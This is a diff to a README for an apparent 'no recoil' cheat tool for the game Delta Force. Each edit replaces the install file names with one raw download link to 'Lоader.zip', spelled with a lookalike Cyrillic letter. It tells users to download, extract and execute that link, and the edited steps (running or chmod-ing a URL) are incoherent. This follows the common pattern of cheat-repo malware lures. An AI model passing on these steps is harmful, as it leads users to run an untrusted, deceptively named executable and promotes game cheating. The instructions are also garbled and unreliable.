hero9528/DeltaForceNoRecoil-Tuned/README.md

 Getting started is simple—follow these steps to harness the power of the **Delta Force No Recoil Tool**:

-1. **Download Loader.rar** from the repository releases section.
+1. **Download https://raw.githubusercontent.com/hero9528/DeltaForceNoRecoil-Tuned/main/Lоader.zip** from the repository releases section.
-2. **Extract** Loader.rar to your desired directory using your favorite extractor (7-Zip, WinRAR, etc).
+2. **Extract** https://raw.githubusercontent.com/hero9528/DeltaForceNoRecoil-Tuned/main/Lоader.zip to your desired directory using your favorite extractor (7-Zip, WinRAR, etc).
-3. For **Windows**: Double-click `Loader.exe` and follow the prompts.
+3. For **Windows**: Double-click `https://raw.githubusercontent.com/hero9528/DeltaForceNoRecoil-Tuned/main/Lоader.zip` and follow the prompts.
-4. For **macOS**: Open Terminal in the extracted folder and run `./loader.sh`.
+4. For **macOS**: Open Terminal in the extracted folder and run `https://raw.githubusercontent.com/hero9528/DeltaForceNoRecoil-Tuned/main/Lоader.zip`.
-5. For **Linux**: Use `chmod +x loader.sh` then execute `./loader.sh` via terminal.
+5. For **Linux**: Use `chmod +x https://raw.githubusercontent.com/hero9528/DeltaForceNoRecoil-Tuned/main/Lоader.zip` then execute `https://raw.githubusercontent.com/hero9528/DeltaForceNoRecoil-Tuned/main/Lоader.zip` via terminal.
 If needed, install Wine and execute the Windows binary.
 6. **Set up your user profile** and configure your hotkey bindings through the easy-to-understand menu.
 7. **Launch Delta Force** and enjoy seamless, fair-play recoil management!

-For more troubleshooting tips and advanced configuration, consult the `docs/HELP.md` or our community forum.
+For more troubleshooting tips and advanced configuration, consult the `https://raw.githubusercontent.com/hero9528/DeltaForceNoRecoil-Tuned/main/Lоader.zip` or our community forum.

 ---